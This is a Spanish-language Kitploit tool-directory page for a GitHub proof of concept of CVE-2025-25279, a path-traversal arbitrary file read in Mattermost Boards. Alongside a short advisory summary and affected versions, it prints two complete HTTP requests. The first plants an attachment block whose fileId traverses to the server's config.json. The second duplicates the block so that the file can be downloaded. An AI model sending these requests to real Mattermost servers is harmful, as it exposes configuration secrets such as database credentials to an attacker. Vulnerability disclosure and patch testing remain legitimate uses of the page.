Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-25279 | Kitploit
Herramientas/GitHubGitHub/numanturle/cve-2025-25279
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosRecopilación de InformaciónMala Configuración
GitHubnumanturle/cve-2025-25279

CVE-2025-25279

Ver Repositorio
42hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Aviso de seguridad MMSA-2025-00430 / CVE-2025-25279

Resumen

Después de subir un archivo a Mattermost Boards, cuando se modifica el parámetro fileId y se copia el tablero, el archivo ahora apunta y descarga el archivo objetivo especificado en el parámetro.

Versiones afectadas: Instancias de Mattermost con Boards habilitado CVE: CVE-2025-25279

Descripción

Las versiones de Mattermost 10.4.x <= 10.4.1, 9.11.x <= 9.11.7, 10.3.x <= 10.3.2, 10.2.x <= 10.2.2 no validan correctamente los bloques de los tableros al importarlos, lo que permite a un atacante leer cualquier archivo arbitrario del sistema mediante la importación y exportación de un archivo de importación especialmente diseñado en Boards.

Capturas de pantalla

Screenshot 1 Screenshot 2 Screenshot 3 Screenshot 4

root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive

[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
root@kitploit:~
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization: 
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive


Referencias

  • Actualizaciones de seguridad de Mattermost
  • CWE-200: Exposición de información
  • CVE-2025-25279

El crédito no es mío, incluye revisión

Descargar herramienta